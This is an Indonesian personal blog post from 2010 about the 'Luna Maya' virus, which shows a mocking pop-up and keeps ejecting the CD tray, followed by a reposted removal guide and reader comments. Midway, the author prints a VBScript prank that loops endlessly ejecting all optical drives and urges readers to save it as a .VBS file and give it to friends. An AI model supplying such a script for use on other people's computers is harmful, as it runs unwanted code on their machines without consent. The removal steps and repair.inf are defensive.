Wednesday, June 30, 2010

Virus Luna Maya?


Selamat Malam Sahabat DJ Site Semua,

Pasti pada bingung kenapa barusan Postingan saya cuma judul doank tampa isi hahhaa.....maaf-maaf.....Internet saya tiba-tiba Lost Connect dan ternyata langsung keposting padahal saya baru nulis judul haha

Lanjut ke Postingan, saya sendiri bingung mau ngasih judul apa dipostingan saya malam ini, dan setelah dipikir-pikir kayanya lebih tepat dikasih nama Virus Luna Maya?

Kenapa mendadak saya kasih nama Virus Luna Maya? soalnya tadi sore temen saya terinfeksi virus ini waktu pengen nonton Video Mesumnya Luna Maya... Jiah hahha.....sebenernya saya mau ketawa pas dia bilang kena Virus Luna Maya, dan yang ada di otaQ saya tadi sore, ya mungkin temen saya ini bener-bener terpesona abiz ng'liat Video Mesum Luna Maya makanya bilang gtu...tapi setelah saya Ng'liat sendiri ternyata emank bener ada virus namanya Luna Maya hahha.......Dan bentuknya kaya gambar diatas......

Nah, trus cara kerja Virus ini gimana? Virus ini akan nayangin pesan Gokil yang meledek Bokep Holic di Indonesia, dengan menampilkan Pop Up bertuliskan "dasar!! otak bokep.." pokoknya ya persis kaya Image diatas.....dan selain itu, DVD-Rom temen saya itu juga keluar masuk sendiri biarpun udah ditutup secara manual pake tombol DVD-Romnya.

Dan secara langsung, saya inget dulu waktu SMP pernah ngisengin orang pake Virus ini dan anda bisa ikutan bikin pake Notepad/Textpad Nie saya kasih ketikin Scriptnya:

Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop


Trus tinggal di save dengan “VirusGw.VBS” & Berikan keteman Anda dan tunggu aja reaksinya hhe.....Oiya savenya terserah koQ mau dinamain apaan yang penting akhirannya kasih ext. VBS....wew. koq jadi ngajarin bikin Virus toh haha.....gpp deh sekali-kali...


Balik lagi ke masalah Virus Luna Maya...yang diantivirus temen saya ke detect dengan nama Suspicious_Gen2.LBT. Nah, trus gimana cara menghilangkan Virus Luna Maya ini?


Nie cara yang udah diposting disalah satu situs Komunitas Hacker yang saya ikutan gabung dan udah diuji coba. Silahkan di praktekan sendiri Okeh saya Repost deh untuk anda

1. Lakukan pembersihan virus pada mode “safe mode”.

  • Untuk masuk pada mode “safe mode”, tekan tombol F8 pada keyboard saat komputer dinyalakan.
  • Pada menu Windows Advanced Options, anda dapat memilih mode “safe mode” atau dapat juga mode “safe mode with networking” dan “command prompt”. Agar lebih mudah pilih saja mode “safe mode”.
  • Biarkan windows berjalan hingga muncul jendela konfirmasi penggunaan “safe mode”. (lihat gambar 12)
  • Klik pilihan “Yes”, untuk menggunakan mode “safe mode” pada jendela konfirmasi tersebut.

2. Matikan proses virus yang aktif pada memory.
  • Gunakan tools pengganti Task Manager dalam hal ini gunakan CurProcess. Download tools CurrProcess pada link berikut ini : http://www.nirsoft.net/utils/cprocess.zip
  • Jalankan CurrProcess, kemudian cari file virus “Amoumain.exe”. Klik kiri file virus, kemudian pilih “Kill Selected Processes”. Jika file virus sudah hilang, maka tutup jendela CurrProcess.

3. Perbaiki registry windows yang sudah di modifikasi oleh virus dengan langkah sebagai berikut :

a. Salin script dibawah ini menggunakan wordpad. Klik menu [Start] à [All Programs] à [Accessoris] à [Wordpad].

[Version]
Signature="$Chicago$"
Provider=Vaksincom Oyee

[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del

[UnhookRegKey]
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, ShowSuperHidden,0x00010001,1
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, SuperHidden,0x00010001,1
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, HideFileExt,0x00010001,0
HKLM, SOFTWARE\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
HKLM, SOFTWARE\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
HKLM, SOFTWARE\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
HKLM, SOFTWARE\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
HKLM, SOFTWARE\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"

[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\system, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\explorer, NoRun

b. Simpan file dengan nama “repair.inf”. Gunakan pilihan Save as type menjadi Text Document agar tidak terjadi kesalahan.
c. Klik kanan file “repair.inf” kemudian pilih “Install”.

4. Hapus file virus “Luna Maya” dengan ciri-ciri sebagai berikut :
  • Memiliki type file “Application”
  • Memiliki ukuran file “37 kb”
  • Memiliki icon file MS Word

Catatan :
  • Untuk mempermudah pencarian sebaiknya gunakan fungsi Search Windows dengan menggunakan filter file *.exe dan *.inf dan berukuran 37 kb.
  • Hapus file virus yang biasanya mempunyai date modified yang sama.
  • Pastikan hapus file virus utama seperti : Amoumain.exe, Luna Maya.exe, Love.exe, dan nt.bat
  • Log-off komputer, kemudian log-in kembali.

5. Untuk pembersihan yang optimal dan mencegah infeksi ulang, scan kembali menggunakan antivirus yang ter-update dan mengenali virus ini dengan baik.

6. Untuk USB flash atau removable drive yang sudah di rusak atau format oleh virus, sebaiknya gunakan software recovery untuk mengembalikan data yang hilang.

Nah, Itu dia cara menghilangkannya.....Buat Sahabat DJ Site semua...Happy blogging yach....



7 komentar:

Umy Diary said...

pertama
umy pertamax

siroel said...

keduaxxxxxx
aku keduaxxx...

WONG SIKAMPUH said...

Asyk dpt yg ketiga.....Kok komen nya kaya gini aja sih...Mana dukungan dan sumbangan pemikiran dari konten ini?

Nuy said...

kelimaxx ga yah??

waaa jadi ada juga toh Virus lunmay.. hihihi.. bisa dipraktekkan nih.. :D

mixedfresh said...

mampir lagi mas fer ngliat otak bokep.. hehe

TUKANG CoLoNG said...

cerita yang lucu dan diakhiri tips jitu. mantap. paham ilmu banget nih kayaknya..:)

jenius

DJ Site said...

@ Umy Diary : hho...Ocre deh Umy....

@ siroel : Ok Roel....

@ WONG SIKAMPUH : haha...gpp Sob...soalnya postingannya tadi ga muncul UMy sama Siroel aja yg kecepetan haha.....thnx Sob...

@ Coretan Felix: aku juga ga tau Sob...

@ Nuy: iya NUy kelimax hho....iya silahkan deh klo mau nyoba hho...

@ mixedfresh: hahaha.....OK Sob...

@ TUKANG CoLoNG: ga juga sih cuma pernah ngalamin aja hhe...

Visit the Site

Butuh template blog ini? monggo DOWNLOAD DISINI

Yahoo bot last visit powered by MyPagerank.Net Msn bot last visit powered by MyPagerank.Net Internet Blog Directory Computers Blogs

IBX582988F60A263

Matur suwun sanget wes neympet-nyempeti mampir dulur-dulur Blogger dan Netter sekalian